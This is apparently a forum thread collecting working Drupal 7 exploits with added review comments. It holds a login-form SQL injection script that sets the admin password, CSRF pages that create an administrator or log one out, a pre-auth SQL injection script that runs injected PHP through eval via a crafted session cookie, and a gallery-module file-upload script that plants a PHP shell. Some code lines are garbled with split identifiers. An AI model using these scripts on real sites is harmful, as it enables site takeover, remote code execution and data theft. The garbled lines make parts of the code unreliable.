
Drupal 2012 - 2015 Exploits


  • Drupal 2012 - 2015 Exploits

    کد:
    Drupal core 7.x - SQL Injection
    [php]
    <?php
    // Proof of concept for the Drupal 7 core login-form SQL injection named
    // above. The only input is the site base URL in `$url`; the script sends one
    // POST to the login form and reads the response body.
    // NOTE(review): `$url` has no trailing slash, so the success message below
    // prints "{$url}user/login" as "...example.comuser/login" — the path in the
    // message is wrong as written.
    $url = 'http://www.example.com';
    // POST body of the standard login form. The SQL is carried in the *key* of
    // the `name[...]` array parameter, not in a value; legitimate form
    // submissions never have array keys that contain SQL keywords, which makes
    // this request shape a reliable WAF/log signature for defenders. The long
    // literal passed to urlencode() is a pre-computed Drupal password hash which
    // the post states corresponds to the password "admin".
    $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F .0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id= user_login_block&op=Log+in";
     
    // Plain stream-context POST; no cookies, no TLS options, no timeout.
    $params = array(
    'http' => array(
    'method' => 'POST',
    'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
    'content' => $post_data
    )
    );
    $ctx = stream_context_create($params);
    // NOTE(review): the second argument of file_get_contents() is
    // `use_include_path` (bool); passing null here is a loose-typing artefact.
    $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
     
    // Outcome is inferred from a PHP warning text appearing in the HTML. This is
    // a heuristic only: a site that does not render PHP errors takes the else
    // branch regardless of what happened server-side, so "isn't vulnerable" is
    // not a reliable negative result.
    if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
    echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
    } else {
    echo "the website isn't vulnerable";
    }
    ?>
    [/php]

     
    کد:
    Csrf Drupal 7.12 Exploit (Add Administrator)
    [php]
     <!-- CSRF proof of concept: when a logged-in Drupal administrator opens this
          page, the browser auto-submits a hidden copy of the "create user" form to
          the admin endpoint with the victim's cookies attached. `<drupal_ip>` in
          the action URL is a placeholder for the target host. -->
     <html>
     <body onload="javascript:document.forms[0].submit()">
     <H2>CSRF Exploit change user to admin</H2>
     <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
     <input type="hidden" name="name" value="new_admin"/>
     <input type="hidden" name="mail" value="new_admin@new_admin.com"/>
     <input type="hidden" name="pass[pass1]" value="new_password"/>
     <input type="hidden" name="pass[pass2]" value="new_password"/>
     <input type="hidden" name="status" value="1"/>
     <!-- roles[3]: role id 3 is assumed to be the administrator role; role ids
          are site-specific — TODO confirm. -->
     <input type="hidden" name="roles[3]" value="3"/>
     <input type="hidden" name="timezone" value="Europe/Prague"/>
     <!-- NOTE(review): form_build_id and form_token are fixed values copied from
          one session. Drupal form tokens are normally bound to the user's
          session, so a static token should be rejected for any other victim;
          the PoC therefore only works where that binding is missing or the
          token is predictable — the token check is the control that defeats
          this. -->
     <input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
     <input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
     <input type="hidden" name="form_id" value="user_register_form"/>
     <input type="hidden" name="op" value="Create new account"/>
     </form>
     </body>
     </html>
     [/php]
     
    کد:
    Csrf Drupal 7.12 Exploit (Force logout)
    [php]
     <!-- Logout-CSRF proof of concept: an empty form that auto-POSTs to the
          logout path, terminating the victim's session. This is a nuisance /
          denial-of-service class issue, not privilege escalation; it only
          requires that the logout endpoint accept a POST without a token.
          `<drupal_ip>` is a placeholder for the target host. -->
     <html>
     <body onload="javascript:document.forms[0].submit()">
     <H2>CSRF Exploit to logout Admin</H2>
     <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
     </form>
     </body>
     </html>
     [/php]


    کد:
    Poc for Drupal Pre Auth SQL Injection
    [php]
    <?php
    //    _____      __   __  _             _______
    //   / ___/___  / /__/ /_(_)___  ____  / ____(_)___  _____
    //   \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
    //  ___/ /  __/ ,< / /_/ / /_/ / / / / /___/ / / / (__  )
    // /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
    // Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
    //
    // created by Stefan Horst <[email protected]>
    //        and Stefan Esser <[email protected]>
    //·
    // Command-line script (reads $argv). It builds a session cookie whose *name*
    // carries a SQL UNION and sends one GET to the target.
    // NOTE(review): several lines below (the str_replace chain, the $_SESSION
    // literal, $serial and $inject) were garbled during extraction — identifiers
    // are split by stray spaces — so the listing does not parse as pasted.
     
    // Drupal core include files, presumably copied next to this script; they
    // supply user_hash_password() and drupal_random_key() used below.
    include 'common.inc';
    include 'password.inc';
     
    // set values
    // uid/name placed into the fabricated session row.
    $user_id = 0;
    $user_name = '';
     
    // Default payload: phpinfo() as proof of execution, then the session is
    // destroyed so the injected row leaves no live session behind.
    $code_inject = 'phpinfo();session_destroy();die("");';
     
    // argv[1] = target URL, argv[2] = inline code or a path to a file.
    $url = isset($argv[1])?$argv[1]:'';
    $code = isset($argv[2])?$argv[2]:'';
     
    if ($url == '-h') {
          echo "usage:\n";
          echo $argv[0].' $url [$code|$file]'."\n";
          die();
    }
     
    // NOTE(review): `strpos(...) === False` only requires "https" to occur
    // somewhere in the string, not that the URL starts with it.
    if (empty($url) || strpos($url,'https') === False) {
          echo "please state the cookie url. It works only with https urls.\n";
          die();
    }
     
    // When argv[2] names a file, its contents are used with PHP open/close tags
    // stripped (so the file can be a normal .php file).
    if (!empty($code)) {
          if (is_file($code)) {
                  $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',s tr_replace('?'.'>','',file_get_contents($code))));
          } else {
                  $code_inject = $code;
          }
    }
     
    $code_inject = rtrim($code_inject,';');
    $code_inject .= ';session_destroy();die("");';
     
    // Drop a leading "www." so the cookie name below is derived from the bare
    // host (see $session_name).
    if (strpos($url, 'www.') === 0) {
          $url = substr($url, 4);
    }
     
    // Session contents that get serialized into the fabricated session row.
    // The keys mirror a Drupal form-state structure; 'args'[0] is a reference to
    // 'string' so that the serialized form preserves the link between the two.
    $_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($c ode_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
    $_SESSION['build_info']['args'][0] = &$_SESSION['string'];
     
    // Host part of the URL (everything after "://"), used to derive the cookie
    // name the target expects.
    list( , $session_name) = explode('://', $url, 2);
     
    // use insecure cookie with sql inj.
    // Cookie name = "SESS" + first 32 hex chars of sha256(host); the secure
    // variant used further down is the same name with an "S" prefix.
    $cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
    // Drupal-format hash of the literal password 'test' for the fabricated row.
    $password = user_hash_password('test');
     
    $session_id = drupal_random_key();
    $sec_ssid = drupal_random_key();
     
    // Braces are swapped for placeholder words here and restored server-side by
    // the REPLACE(...CHAR(...)) calls in $inject, so no literal "{" / "}" travel
    // in the cookie.
    $serial = str_replace('}','CURLYCLOSE',str_replace('{','CURL YOPEN',"batch_form_state|".serialize($_SESSION)));
    // UNION SELECT supplying one fabricated row (user fields followed by the
    // serialized session). Column count/order is assumed to match the target's
    // schema — TODO confirm. Defensive signal: a session cookie *name* of the
    // form SESS<hex>[...] that contains SQL keywords; real Drupal cookies never
    // carry array syntax in the name.
    $inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0, 0,0,1,null,'',0,'',null,$user_id,'$session_id','', '127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CUR LYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".or d('{').")) -- ";
     
    // Three cookies: the array-keyed name that carries $inject, the plain one,
    // and the secure "S"-prefixed one.
    $cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
     
    $ch = curl_init($url);
     
    // Response headers are included in $output; TLS peer verification is off.
    curl_setopt($ch,CURLOPT_HEADER,True);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
    curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
    curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
     
    curl_setopt($ch,CURLOPT_HTTPHEADER,array(
          'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Accept-Language: en-US,en;q=0.5'
    ));
     
    curl_setopt($ch,CURLOPT_COOKIE,$cookie);
     
    // Single GET; no error check on a false return from curl_exec().
    $output = curl_exec($ch);
     
    curl_close($ch);
     
    // Raw response (headers + body) is printed as-is.
    echo $output;
    [/php]

  • #2
    RE: Drupal 2012 - 2015 Exploits

    [align=center] Drupal Modules - Drag & Drop Gallery Arbitrary File Upload Vulnerability [/align]
    [php]

    <?php
     
    // Two local files with a double extension; whether ".php.gif" is executed as
    // PHP depends on the web server's handler configuration — TODO confirm. A
    // server that maps handlers on the final extension only removes that path.
    $uploadfile="db.php.gif";
    $uploadfile2="lo.php.gif";
     
    // The module's upload endpoint takes the destination directory from the
    // `filedir` query parameter. That, plus keeping the client-supplied file
    // name, is the defect: mitigation on the module side is to ignore
    // client-supplied paths, allow-list extensions on the final name segment,
    // and store uploads outside any executable web path.
    $ch = curl_init("http://localhost/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
    curl_setopt($ch, CURLOPT_POST, true);
    // NOTE(review): the "@filename" form of CURLOPT_POSTFIELDS is the legacy
    // file-upload syntax and is not supported by current PHP releases.
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
                                               'user_file[1]'=>"@$uploadfile2"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // Response body is printed unchanged; a false return is not checked.
    $postResult = curl_exec($ch);
    curl_close($ch);
     
    print "$postResult";
     
    ?>
     
    Shell Access : http://localhost/drupal/sites/all/modules/dragdrop_gallery/ lo.php.gif db.php.gif
    Filename : $postResult output
     
    lo.php
    <?php
    // Contents of the uploaded file: phpinfo() serves only as proof that
    // server-side execution occurred.
    phpinfo();
    ?>
    [/php]
